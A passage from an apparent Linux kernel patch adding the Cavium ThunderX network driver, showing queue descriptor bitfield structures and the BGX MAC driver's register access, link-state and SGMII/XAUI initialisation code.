CQE_RX_ERR_L3_ICRC = 0x46, + CQE_RX_ERR_L3_PCLP = 0x47, + CQE_RX_ERR_L4_MAL = 0x61, + CQE_RX_ERR_L4_CHK = 0x62, + CQE_RX_ERR_UDP_LEN = 0x63, + CQE_RX_ERR_L4_PORT = 0x64, + CQE_RX_ERR_TCP_FLAG = 0x65, + CQE_RX_ERR_TCP_OFFSET = 0x66, + CQE_RX_ERR_L4_PCLP = 0x67, + CQE_RX_ERR_RBDR_TRUNC = 0x70, +}; + +struct cqe_rx_t { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 cqe_type:4; /* W0 */ + u64 stdn_fault:1; + u64 rsvd0:1; + u64 rq_qs:7; + u64 rq_idx:3; + u64 rsvd1:12; + u64 rss_alg:4; + u64 rsvd2:4; + u64 rb_cnt:4; + u64 vlan_found:1; + u64 vlan_stripped:1; + u64 vlan2_found:1; + u64 vlan2_stripped:1; + u64 l4_type:4; + u64 l3_type:4; + u64 l2_present:1; + u64 err_level:3; + u64 err_opcode:8; + + u64 pkt_len:16; /* W1 */ + u64 l2_ptr:8; + u64 l3_ptr:8; + u64 l4_ptr:8; + u64 cq_pkt_len:8; + u64 align_pad:3; + u64 rsvd3:1; + u64 chan:12; + + u64 rss_tag:32; /* W2 */ + u64 vlan_tci:16; + u64 vlan_ptr:8; + u64 vlan2_ptr:8; + + u64 rb3_sz:16; /* W3 */ + u64 rb2_sz:16; + u64 rb1_sz:16; + u64 rb0_sz:16; + + u64 rb7_sz:16; /* W4 */ + u64 rb6_sz:16; + u64 rb5_sz:16; + u64 rb4_sz:16; + + u64 rb11_sz:16; /* W5 */ + u64 rb10_sz:16; + u64 rb9_sz:16; + u64 rb8_sz:16; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 err_opcode:8; + u64 err_level:3; + u64 l2_present:1; + u64 l3_type:4; + u64 l4_type:4; + u64 vlan2_stripped:1; + u64 vlan2_found:1; + u64 vlan_stripped:1; + u64 vlan_found:1; + u64 rb_cnt:4; + u64 rsvd2:4; + u64 rss_alg:4; + u64 rsvd1:12; + u64 rq_idx:3; + u64 rq_qs:7; + u64 rsvd0:1; + u64 stdn_fault:1; + u64 cqe_type:4; /* W0 */ + u64 chan:12; + u64 rsvd3:1; + u64 align_pad:3; + u64 cq_pkt_len:8; + u64 l4_ptr:8; + u64 l3_ptr:8; + u64 l2_ptr:8; + u64 pkt_len:16; /* W1 */ + u64 vlan2_ptr:8; + u64 vlan_ptr:8; + u64 vlan_tci:16; + u64 rss_tag:32; /* W2 */ + u64 rb0_sz:16; + u64 rb1_sz:16; + u64 rb2_sz:16; + u64 rb3_sz:16; /* W3 */ + u64 rb4_sz:16; + u64 rb5_sz:16; + u64 rb6_sz:16; + u64 rb7_sz:16; /* W4 */ + u64 rb8_sz:16; + u64 rb9_sz:16; + u64 rb10_sz:16; + u64 rb11_sz:16; /* W5 */ +#endif + u64 rb0_ptr:64; + u64 rb1_ptr:64; + u64 rb2_ptr:64; + u64 rb3_ptr:64; + u64 rb4_ptr:64; + u64 rb5_ptr:64; + u64 rb6_ptr:64; + u64 rb7_ptr:64; + u64 rb8_ptr:64; + u64 rb9_ptr:64; + u64 rb10_ptr:64; + u64 rb11_ptr:64; +}; + +struct cqe_rx_tcp_err_t { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 cqe_type:4; /* W0 */ + u64 rsvd0:60; + + u64 rsvd1:4; /* W1 */ + u64 partial_first:1; + u64 rsvd2:27; + u64 rbdr_bytes:8; + u64 rsvd3:24; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 rsvd0:60; + u64 cqe_type:4; + + u64 rsvd3:24; + u64 rbdr_bytes:8; + u64 rsvd2:27; + u64 partial_first:1; + u64 rsvd1:4; +#endif +}; + +struct cqe_rx_tcp_t { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 cqe_type:4; /* W0 */ + u64 rsvd0:52; + u64 cq_tcp_status:8; + + u64 rsvd1:32; /* W1 */ + u64 tcp_cntx_bytes:8; + u64 rsvd2:8; + u64 tcp_err_bytes:16; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 cq_tcp_status:8; + u64 rsvd0:52; + u64 cqe_type:4; /* W0 */ + + u64 tcp_err_bytes:16; + u64 rsvd2:8; + u64 tcp_cntx_bytes:8; + u64 rsvd1:32; /* W1 */ +#endif +}; + +struct cqe_send_t { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 cqe_type:4; /* W0 */ + u64 rsvd0:4; + u64 sqe_ptr:16; + u64 rsvd1:4; + u64 rsvd2:10; + u64 sq_qs:7; + u64 sq_idx:3; + u64 rsvd3:8; + u64 send_status:8; + + u64 ptp_timestamp:64; /* W1 */ +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 send_status:8; + u64 rsvd3:8; + u64 sq_idx:3; + u64 sq_qs:7; + u64 rsvd2:10; + u64 rsvd1:4; + u64 sqe_ptr:16; + u64 rsvd0:4; + u64 cqe_type:4; /* W0 */ + + u64 ptp_timestamp:64; /* W1 */ +#endif +}; + +union cq_desc_t { + u64 u[64]; + struct cqe_send_t snd_hdr; + struct cqe_rx_t rx_hdr; + struct cqe_rx_tcp_t rx_tcp_hdr; + struct cqe_rx_tcp_err_t rx_tcp_err_hdr; +}; + +struct rbdr_entry_t { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 rsvd0:15; + u64 buf_addr:42; + u64 cache_align:7; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 cache_align:7; + u64 buf_addr:42; + u64 rsvd0:15; +#endif +}; + +/* TCP reassembly context */ +struct rbe_tcp_cnxt_t { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 tcp_pkt_cnt:12; + u64 rsvd1:4; + u64 align_hdr_bytes:4; + u64 align_ptr_bytes:4; + u64 ptr_bytes:16; + u64 rsvd2:24; + u64 cqe_type:4; + u64 rsvd0:54; + u64 tcp_end_reason:2; + u64 tcp_status:4; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 tcp_status:4; + u64 tcp_end_reason:2; + u64 rsvd0:54; + u64 cqe_type:4; + u64 rsvd2:24; + u64 ptr_bytes:16; + u64 align_ptr_bytes:4; + u64 align_hdr_bytes:4; + u64 rsvd1:4; + u64 tcp_pkt_cnt:12; +#endif +}; + +/* Always Big endian */ +struct rx_hdr_t { + u64 opaque:32; + u64 rss_flow:8; + u64 skip_length:6; + u64 disable_rss:1; + u64 disable_tcp_reassembly:1; + u64 nodrop:1; + u64 dest_alg:2; + u64 rsvd0:2; + u64 dest_rq:11; +}; + +enum send_l4_csum_type { + SEND_L4_CSUM_DISABLE = 0x00, + SEND_L4_CSUM_UDP = 0x01, + SEND_L4_CSUM_TCP = 0x02, + SEND_L4_CSUM_SCTP = 0x03, +}; + +enum send_crc_alg { + SEND_CRCALG_CRC32 = 0x00, + SEND_CRCALG_CRC32C = 0x01, + SEND_CRCALG_ICRC = 0x02, +}; + +enum send_load_type { + SEND_LD_TYPE_LDD = 0x00, + SEND_LD_TYPE_LDT = 0x01, + SEND_LD_TYPE_LDWB = 0x02, +}; + +enum send_mem_alg_type { + SEND_MEMALG_SET = 0x00, + SEND_MEMALG_ADD = 0x08, + SEND_MEMALG_SUB = 0x09, + SEND_MEMALG_ADDLEN = 0x0A, + SEND_MEMALG_SUBLEN = 0x0B, +}; + +enum send_mem_dsz_type { + SEND_MEMDSZ_B64 = 0x00, + SEND_MEMDSZ_B32 = 0x01, + SEND_MEMDSZ_B8 = 0x03, +}; + +enum sq_subdesc_type { + SQ_DESC_TYPE_INVALID = 0x00, + SQ_DESC_TYPE_HEADER = 0x01, + SQ_DESC_TYPE_CRC = 0x02, + SQ_DESC_TYPE_IMMEDIATE = 0x03, + SQ_DESC_TYPE_GATHER = 0x04, + SQ_DESC_TYPE_MEMORY = 0x05, +}; + +struct sq_crc_subdesc { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 rsvd1:32; + u64 crc_ival:32; + u64 subdesc_type:4; + u64 crc_alg:2; + u64 rsvd0:10; + u64 crc_insert_pos:16; + u64 hdr_start:16; + u64 crc_len:16; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 crc_len:16; + u64 hdr_start:16; + u64 crc_insert_pos:16; + u64 rsvd0:10; + u64 crc_alg:2; + u64 subdesc_type:4; + u64 crc_ival:32; + u64 rsvd1:32; +#endif +}; + +struct sq_gather_subdesc { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 subdesc_type:4; /* W0 */ + u64 ld_type:2; + u64 rsvd0:42; + u64 size:16; + + u64 rsvd1:15; /* W1 */ + u64 addr:49; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 size:16; + u64 rsvd0:42; + u64 ld_type:2; + u64 subdesc_type:4; /* W0 */ + + u64 addr:49; + u64 rsvd1:15; /* W1 */ +#endif +}; + +/* SQ immediate subdescriptor */ +struct sq_imm_subdesc { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 subdesc_type:4; /* W0 */ + u64 rsvd0:46; + u64 len:14; + + u64 data:64; /* W1 */ +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 len:14; + u64 rsvd0:46; + u64 subdesc_type:4; /* W0 */ + + u64 data:64; /* W1 */ +#endif +}; + +struct sq_mem_subdesc { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 subdesc_type:4; /* W0 */ + u64 mem_alg:4; + u64 mem_dsz:2; + u64 wmem:1; + u64 rsvd0:21; + u64 offset:32; + + u64 rsvd1:15; /* W1 */ + u64 addr:49; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 offset:32; + u64 rsvd0:21; + u64 wmem:1; + u64 mem_dsz:2; + u64 mem_alg:4; + u64 subdesc_type:4; /* W0 */ + + u64 addr:49; + u64 rsvd1:15; /* W1 */ +#endif +}; + +struct sq_hdr_subdesc { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 subdesc_type:4; + u64 tso:1; + u64 post_cqe:1; /* Post CQE on no error also */ + u64 dont_send:1; + u64 tstmp:1; + u64 subdesc_cnt:8; + u64 csum_l4:2; + u64 csum_l3:1; + u64 rsvd0:5; + u64 l4_offset:8; + u64 l3_offset:8; + u64 rsvd1:4; + u64 tot_len:20; /* W0 */ + + u64 tso_sdc_cont:8; + u64 tso_sdc_first:8; + u64 tso_l4_offset:8; + u64 tso_flags_last:12; + u64 tso_flags_first:12; + u64 rsvd2:2; + u64 tso_max_paysize:14; /* W1 */ +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 tot_len:20; + u64 rsvd1:4; + u64 l3_offset:8; + u64 l4_offset:8; + u64 rsvd0:5; + u64 csum_l3:1; + u64 csum_l4:2; + u64 subdesc_cnt:8; + u64 tstmp:1; + u64 dont_send:1; + u64 post_cqe:1; /* Post CQE on no error also */ + u64 tso:1; + u64 subdesc_type:4; /* W0 */ + + u64 tso_max_paysize:14; + u64 rsvd2:2; + u64 tso_flags_first:12; + u64 tso_flags_last:12; + u64 tso_l4_offset:8; + u64 tso_sdc_first:8; + u64 tso_sdc_cont:8; /* W1 */ +#endif +}; + +/* Queue config register formats */ +struct rq_cfg { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 reserved_2_63:62; + u64 ena:1; + u64 tcp_ena:1; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 tcp_ena:1; + u64 ena:1; + u64 reserved_2_63:62; +#endif +}; + +struct cq_cfg { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 reserved_43_63:21; + u64 ena:1; + u64 reset:1; + u64 caching:1; + u64 reserved_35_39:5; + u64 qsize:3; + u64 reserved_25_31:7; + u64 avg_con:9; + u64 reserved_0_15:16; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 reserved_0_15:16; + u64 avg_con:9; + u64 reserved_25_31:7; + u64 qsize:3; + u64 reserved_35_39:5; + u64 caching:1; + u64 reset:1; + u64 ena:1; + u64 reserved_43_63:21; +#endif +}; + +struct sq_cfg { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 reserved_20_63:44; + u64 ena:1; + u64 reserved_18_18:1; + u64 reset:1; + u64 ldwb:1; + u64 reserved_11_15:5; + u64 qsize:3; + u64 reserved_3_7:5; + u64 tstmp_bgx_intf:3; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 tstmp_bgx_intf:3; + u64 reserved_3_7:5; + u64 qsize:3; + u64 reserved_11_15:5; + u64 ldwb:1; + u64 reset:1; + u64 reserved_18_18:1; + u64 ena:1; + u64 reserved_20_63:44; +#endif +}; + +struct rbdr_cfg { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 reserved_45_63:19; + u64 ena:1; + u64 reset:1; + u64 ldwb:1; + u64 reserved_36_41:6; + u64 qsize:4; + u64 reserved_25_31:7; + u64 avg_con:9; + u64 reserved_12_15:4; + u64 lines:12; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 lines:12; + u64 reserved_12_15:4; + u64 avg_con:9; + u64 reserved_25_31:7; + u64 qsize:4; + u64 reserved_36_41:6; + u64 ldwb:1; + u64 reset:1; + u64 ena: 1; + u64 reserved_45_63:19; +#endif +}; + +struct qs_cfg { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 reserved_32_63:32; + u64 ena:1; + u64 reserved_27_30:4; + u64 sq_ins_ena:1; + u64 sq_ins_pos:6; + u64 lock_ena:1; + u64 lock_viol_cqe_ena:1; + u64 send_tstmp_ena:1; + u64 be:1; + u64 reserved_7_15:9; + u64 vnic:7; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 vnic:7; + u64 reserved_7_15:9; + u64 be:1; + u64 send_tstmp_ena:1; + u64 lock_viol_cqe_ena:1; + u64 lock_ena:1; + u64 sq_ins_pos:6; + u64 sq_ins_ena:1; + u64 reserved_27_30:4; + u64 ena:1; + u64 reserved_32_63:32; +#endif +}; + +#endif /* Q_STRUCT_H */ diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c new file mode 100644 index 000000000000..020e11cf3fdd --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c @@ -0,0 +1,966 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "nic_reg.h" +#include "nic.h" +#include "thunder_bgx.h" + +#define DRV_NAME "thunder-BGX" +#define DRV_VERSION "1.0" + +struct lmac { + struct bgx *bgx; + int dmac; + unsigned char mac[ETH_ALEN]; + bool link_up; + int lmacid; /* ID within BGX */ + int lmacid_bd; /* ID on board */ + struct net_device netdev; + struct phy_device *phydev; + unsigned int last_duplex; + unsigned int last_link; + unsigned int last_speed; + bool is_sgmii; + struct delayed_work dwork; + struct workqueue_struct *check_link; +} lmac; + +struct bgx { + u8 bgx_id; + u8 qlm_mode; + struct lmac lmac[MAX_LMAC_PER_BGX]; + int lmac_count; + int lmac_type; + int lane_to_sds; + int use_training; + void __iomem *reg_base; + struct pci_dev *pdev; +} bgx; + +struct bgx *bgx_vnic[MAX_BGX_THUNDER]; +static int lmac_count; /* Total no of LMACs in system */ + +static int bgx_xaui_check_link(struct lmac *lmac); + +/* Supported devices */ +static const struct pci_device_id bgx_id_table[] = { + { PCI_DEVICE(PCI_VENDOR_ID_CAVIUM, PCI_DEVICE_ID_THUNDER_BGX) }, + { 0, } /* end of table */ +}; + +MODULE_AUTHOR("Cavium Inc"); +MODULE_DESCRIPTION("Cavium Thunder BGX/MAC Driver"); +MODULE_LICENSE("GPL v2"); +MODULE_VERSION(DRV_VERSION); +MODULE_DEVICE_TABLE(pci, bgx_id_table); + +/* The Cavium ThunderX network controller can *only* be found in SoCs + * containing the ThunderX ARM64 CPU implementation. All accesses to the device + * registers on this platform are implicitly strongly ordered with respect + * to memory accesses. So writeq_relaxed() and readq_relaxed() are safe to use + * with no memory barriers in this driver. The readq()/writeq() functions add + * explicit ordering operation which in this case are redundant, and only + * add overhead. + */ + +/* Register read/write APIs */ +static u64 bgx_reg_read(struct bgx *bgx, u8 lmac, u64 offset) +{ + void __iomem *addr = bgx->reg_base + ((u32)lmac << 20) + offset; + + return readq_relaxed(addr); +} + +static void bgx_reg_write(struct bgx *bgx, u8 lmac, u64 offset, u64 val) +{ + void __iomem *addr = bgx->reg_base + ((u32)lmac << 20) + offset; + + writeq_relaxed(val, addr); +} + +static void bgx_reg_modify(struct bgx *bgx, u8 lmac, u64 offset, u64 val) +{ + void __iomem *addr = bgx->reg_base + ((u32)lmac << 20) + offset; + + writeq_relaxed(val | readq_relaxed(addr), addr); +} + +static int bgx_poll_reg(struct bgx *bgx, u8 lmac, u64 reg, u64 mask, bool zero) +{ + int timeout = 100; + u64 reg_val; + + while (timeout) { + reg_val = bgx_reg_read(bgx, lmac, reg); + if (zero && !(reg_val & mask)) + return 0; + if (!zero && (reg_val & mask)) + return 0; + usleep_range(1000, 2000); + timeout--; + } + return 1; +} + +/* Return number of BGX present in HW */ +unsigned bgx_get_map(int node) +{ + int i; + unsigned map = 0; + + for (i = 0; i < MAX_BGX_PER_CN88XX; i++) { + if (bgx_vnic[(node * MAX_BGX_PER_CN88XX) + i]) + map |= (1 << i); + } + + return map; +} +EXPORT_SYMBOL(bgx_get_map); + +/* Return number of LMAC configured for this BGX */ +int bgx_get_lmac_count(int node, int bgx_idx) +{ + struct bgx *bgx; + + bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; + if (bgx) + return bgx->lmac_count; + + return 0; +} +EXPORT_SYMBOL(bgx_get_lmac_count); + +/* Returns the current link status of LMAC */ +void bgx_get_lmac_link_state(int node, int bgx_idx, int lmacid, void *status) +{ + struct bgx_link_status *link = (struct bgx_link_status *)status; + struct bgx *bgx; + struct lmac *lmac; + + bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; + if (!bgx) + return; + + lmac = &bgx->lmac[lmacid]; + link->link_up = lmac->link_up; + link->duplex = lmac->last_duplex; + link->speed = lmac->last_speed; +} +EXPORT_SYMBOL(bgx_get_lmac_link_state); + +const char *bgx_get_lmac_mac(int node, int bgx_idx, int lmacid) +{ + struct bgx *bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; + + if (bgx) + return bgx->lmac[lmacid].mac; + + return NULL; +} +EXPORT_SYMBOL(bgx_get_lmac_mac); + +void bgx_set_lmac_mac(int node, int bgx_idx, int lmacid, const char *mac) +{ + struct bgx *bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; + + if (!bgx) + return; + + ether_addr_copy(bgx->lmac[lmacid].mac, mac); +} +EXPORT_SYMBOL(bgx_set_lmac_mac); + +static void bgx_sgmii_change_link_state(struct lmac *lmac) +{ + struct bgx *bgx = lmac->bgx; + u64 cmr_cfg; + u64 port_cfg = 0; + u64 misc_ctl = 0; + + cmr_cfg = bgx_reg_read(bgx, lmac->lmacid, BGX_CMRX_CFG); + cmr_cfg &= ~CMR_EN; + bgx_reg_write(bgx, lmac->lmacid, BGX_CMRX_CFG, cmr_cfg); + + port_cfg = bgx_reg_read(bgx, lmac->lmacid, BGX_GMP_GMI_PRTX_CFG); + misc_ctl = bgx_reg_read(bgx, lmac->lmacid, BGX_GMP_PCS_MISCX_CTL); + + if (lmac->link_up) { + misc_ctl &= ~PCS_MISC_CTL_GMX_ENO; + port_cfg &= ~GMI_PORT_CFG_DUPLEX; + port_cfg |= (lmac->last_duplex << 2); + } else { + misc_ctl |= PCS_MISC_CTL_GMX_ENO; + } + + switch (lmac->last_speed) { + case 10: + port_cfg &= ~GMI_PORT_CFG_SPEED; /* speed 0 */ + port_cfg |= GMI_PORT_CFG_SPEED_MSB; /* speed_msb 1 */ + port_cfg &= ~GMI_PORT_CFG_SLOT_TIME; /* slottime 0 */ + misc_ctl &= ~PCS_MISC_CTL_SAMP_PT_MASK; + misc_ctl |= 50; /* samp_pt */ + bgx_reg_write(bgx, lmac->lmacid, BGX_GMP_GMI_TXX_SLOT, 64); + bgx_reg_write(bgx, lmac->lmacid, BGX_GMP_GMI_TXX_BURST, 0); + break; + case 100: + port_cfg &= ~GMI_PORT_CFG_SPEED; /* speed 0 */ + port_cfg &= ~GMI_PORT_CFG_SPEED_MSB; /* speed_msb 0 */ + port_cfg &= ~GMI_PORT_CFG_SLOT_TIME; /* slottime 0 */ + misc_ctl &= ~PCS_MISC_CTL_SAMP_PT_MASK; + misc_ctl |= 5; /* samp_pt */ + bgx_reg_write(bgx, lmac->lmacid, BGX_GMP_GMI_TXX_SLOT, 64); + bgx_reg_write(bgx, lmac->lmacid, BGX_GMP_GMI_TXX_BURST, 0); + break; + case 1000: + port_cfg |= GMI_PORT_CFG_SPEED; /* speed 1 */ + port_cfg &= ~GMI_PORT_CFG_SPEED_MSB; /* speed_msb 0 */ + port_cfg |= GMI_PORT_CFG_SLOT_TIME; /* slottime 1 */ + misc_ctl &= ~PCS_MISC_CTL_SAMP_PT_MASK; + misc_ctl |= 1; /* samp_pt */ + bgx_reg_write(bgx, lmac->lmacid, BGX_GMP_GMI_TXX_SLOT, 512); + if (lmac->last_duplex) + bgx_reg_write(bgx, lmac->lmacid, + BGX_GMP_GMI_TXX_BURST, 0); + else + bgx_reg_write(bgx, lmac->lmacid, + BGX_GMP_GMI_TXX_BURST, 8192); + break; + default: + break; + } + bgx_reg_write(bgx, lmac->lmacid, BGX_GMP_PCS_MISCX_CTL, misc_ctl); + bgx_reg_write(bgx, lmac->lmacid, BGX_GMP_GMI_PRTX_CFG, port_cfg); + + port_cfg = bgx_reg_read(bgx, lmac->lmacid, BGX_GMP_GMI_PRTX_CFG); + + /* renable lmac */ + cmr_cfg |= CMR_EN; + bgx_reg_write(bgx, lmac->lmacid, BGX_CMRX_CFG, cmr_cfg); +} + +void bgx_lmac_handler(struct net_device *netdev) +{ + struct lmac *lmac = container_of(netdev, struct lmac, netdev); + struct phy_device *phydev = lmac->phydev; + int link_changed = 0; + + if (!lmac) + return; + + if (!phydev->link && lmac->last_link) + link_changed = -1; + + if (phydev->link && + (lmac->last_duplex != phydev->duplex || + lmac->last_link != phydev->link || + lmac->last_speed != phydev->speed)) { + link_changed = 1; + } + + lmac->last_link = phydev->link; + lmac->last_speed = phydev->speed; + lmac->last_duplex = phydev->duplex; + + if (!link_changed) + return; + + if (link_changed > 0) + lmac->link_up = true; + else + lmac->link_up = false; + + if (lmac->is_sgmii) + bgx_sgmii_change_link_state(lmac); + else + bgx_xaui_check_link(lmac); +} + +u64 bgx_get_rx_stats(int node, int bgx_idx, int lmac, int idx) +{ + struct bgx *bgx; + + bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; + if (!bgx) + return 0; + + if (idx > 8) + lmac = 0; + return bgx_reg_read(bgx, lmac, BGX_CMRX_RX_STAT0 + (idx * 8)); +} +EXPORT_SYMBOL(bgx_get_rx_stats); + +u64 bgx_get_tx_stats(int node, int bgx_idx, int lmac, int idx) +{ + struct bgx *bgx; + + bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; + if (!bgx) + return 0; + + return bgx_reg_read(bgx, lmac, BGX_CMRX_TX_STAT0 + (idx * 8)); +} +EXPORT_SYMBOL(bgx_get_tx_stats); + +static void bgx_flush_dmac_addrs(struct bgx *bgx, int lmac) +{ + u64 offset; + + while (bgx->lmac[lmac].dmac > 0) { + offset = ((bgx->lmac[lmac].dmac - 1) * sizeof(u64)) + + (lmac * MAX_DMAC_PER_LMAC * sizeof(u64)); + bgx_reg_write(bgx, 0, BGX_CMR_RX_DMACX_CAM + offset, 0); + bgx->lmac[lmac].dmac--; + } +} + +static int bgx_lmac_sgmii_init(struct bgx *bgx, int lmacid) +{ + u64 cfg; + + bgx_reg_modify(bgx, lmacid, BGX_GMP_GMI_TXX_THRESH, 0x30); + /* max packet size */ + bgx_reg_modify(bgx, lmacid, BGX_GMP_GMI_RXX_JABBER, MAX_FRAME_SIZE); + + /* Disable frame alignment if using preamble */ + cfg = bgx_reg_read(bgx, lmacid, BGX_GMP_GMI_TXX_APPEND); + if (cfg & 1) + bgx_reg_write(bgx, lmacid, BGX_GMP_GMI_TXX_SGMII_CTL, 0); + + /* Enable lmac */ + bgx_reg_modify(bgx, lmacid, BGX_CMRX_CFG, CMR_EN); + + /* PCS reset */ + bgx_reg_modify(bgx, lmacid, BGX_GMP_PCS_MRX_CTL, PCS_MRX_CTL_RESET); + if (bgx_poll_reg(bgx, lmacid, BGX_GMP_PCS_MRX_CTL, + PCS_MRX_CTL_RESET, true)) { + dev_err(&bgx->pdev->dev, "BGX PCS reset not completed\n"); + return -1; + } + + /* power down, reset autoneg, autoneg enable */ + cfg = bgx_reg_read(bgx, lmacid, BGX_GMP_PCS_MRX_CTL); + cfg &= ~PCS_MRX_CTL_PWR_DN; + cfg |= (PCS_MRX_CTL_RST_AN | PCS_MRX_CTL_AN_EN); + bgx_reg_write(bgx, lmacid, BGX_GMP_PCS_MRX_CTL, cfg); + + if (bgx_poll_reg(bgx, lmacid, BGX_GMP_PCS_MRX_STATUS, + PCS_MRX_STATUS_AN_CPT, false)) { + dev_err(&bgx->pdev->dev, "BGX AN_CPT not completed\n"); + return -1; + } + + return 0; +} + +static int bgx_lmac_xaui_init(struct bgx *bgx, int lmacid, int lmac_type) +{ + u64 cfg; + + /* Reset SPU */ + bgx_reg_modify(bgx, lmacid, BGX_SPUX_CONTROL1, SPU_CTL_RESET); + if (bgx_poll_reg(bgx, lmacid, BGX_SPUX_CONTROL1, SPU_CTL_RESET, true)) { + dev_err(&bgx->pdev->dev, "BGX SPU reset not completed\n"); + return -1; + } + + /* Disable LMAC */ + cfg = bgx_reg_read(bgx, lmacid, BGX_CMRX_CFG); + cfg &= ~CMR_EN; + bgx_reg_write(bgx, lmacid, BGX_CMRX_CFG, cfg); + + bgx_reg_modify(bgx, lmacid, BGX_SPUX_CONTROL1, SPU_CTL_LOW_POWER); + /* Set interleaved running disparity for RXAUI */ + if (bgx->lmac_type != BGX_MODE_RXAUI) + bgx_reg_modify(bgx, lmacid, + BGX_SPUX_MISC_CONTROL, SPU_MISC_CTL_RX_DIS); + else + bgx_reg_modify(bgx, lmacid, BGX_SPUX_MISC_CONTROL, + SPU_MISC_CTL_RX_DIS | SPU_MISC_CTL_INTLV_RDISP); + + /* clear all interrupts */ + cfg = bgx_reg_read(bgx, lmacid, BGX_SMUX_RX_INT); + bgx_reg_write(bgx, lmacid, BGX_SMUX_RX_INT, cfg); + cfg = bgx_reg_read(bgx, lmacid, BGX_SMUX_TX_INT); + bgx_reg_write(bgx, lmacid, BGX_SMUX_TX_INT, cfg); + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_INT); + bgx_reg_write(bgx, lmacid, BGX_SPUX_INT, cfg); + + if (bgx->use_training) { + bgx_reg_write(bgx, lmacid, BGX_SPUX_BR_PMD_LP_CUP, 0x00); + bgx_reg_write(bgx, lmacid, BGX_SPUX_BR_PMD_LD_CUP, 0x00); + bgx_reg_write(bgx, lmacid, BGX_SPUX_BR_PMD_LD_REP, 0x00); + /* training enable */ + bgx_reg_modify(bgx, lmacid, + BGX_SPUX_BR_PMD_CRTL, SPU_PMD_CRTL_TRAIN_EN); + } + + /* Append FCS to each packet */ + bgx_reg_modify(bgx, lmacid, BGX_SMUX_TX_APPEND, SMU_TX_APPEND_FCS_D); + + /* Disable forward error correction */ + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_FEC_CONTROL); + cfg &= ~SPU_FEC_CTL_FEC_EN; + bgx_reg_write(bgx, lmacid, BGX_SPUX_FEC_CONTROL, cfg); + + /* Disable autoneg */ + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_AN_CONTROL); + cfg = cfg & ~(SPU_AN_CTL_AN_EN | SPU_AN_CTL_XNP_EN); + bgx_reg_write(bgx, lmacid, BGX_SPUX_AN_CONTROL, cfg); + + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_AN_ADV); + if (bgx->lmac_type == BGX_MODE_10G_KR) + cfg |= (1 << 23); + else if (bgx->lmac_type == BGX_MODE_40G_KR) + cfg |= (1 << 24); + else + cfg &= ~((1 << 23) | (1 << 24)); + cfg = cfg & (~((1ULL << 25) | (1ULL << 22) | (1ULL << 12))); + bgx_reg_write(bgx, lmacid, BGX_SPUX_AN_ADV, cfg); + + cfg = bgx_reg_read(bgx, 0, BGX_SPU_DBG_CONTROL); + cfg &= ~SPU_DBG_CTL_AN_ARB_LINK_CHK_EN; + bgx_reg_write(bgx, 0, BGX_SPU_DBG_CONTROL, cfg); + + /* Enable lmac */ + bgx_reg_modify(bgx, lmacid, BGX_CMRX_CFG, CMR_EN); + + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_CONTROL1); + cfg &= ~SPU_CTL_LOW_POWER; + bgx_reg_write(bgx, lmacid, BGX_SPUX_CONTROL1, cfg); + + cfg = bgx_reg_read(bgx, lmacid, BGX_SMUX_TX_CTL); + cfg &= ~SMU_TX_CTL_UNI_EN; + cfg |= SMU_TX_CTL_DIC_EN; + bgx_reg_write(bgx, lmacid, BGX_SMUX_TX_CTL, cfg); + + /* take lmac_count into account */ + bgx_reg_modify(bgx, lmacid, BGX_SMUX_TX_THRESH, (0x100 - 1)); + /* max packet size */ + bgx_reg_modify(bgx, lmacid, BGX_SMUX_RX_JABBER, MAX_FRAME_SIZE); + + return 0; +} + +static int bgx_xaui_check_link(struct lmac *lmac) +{ + struct bgx *bgx = lmac->bgx; + int lmacid = lmac->lmacid; + int lmac_type = bgx->lmac_type; + u64 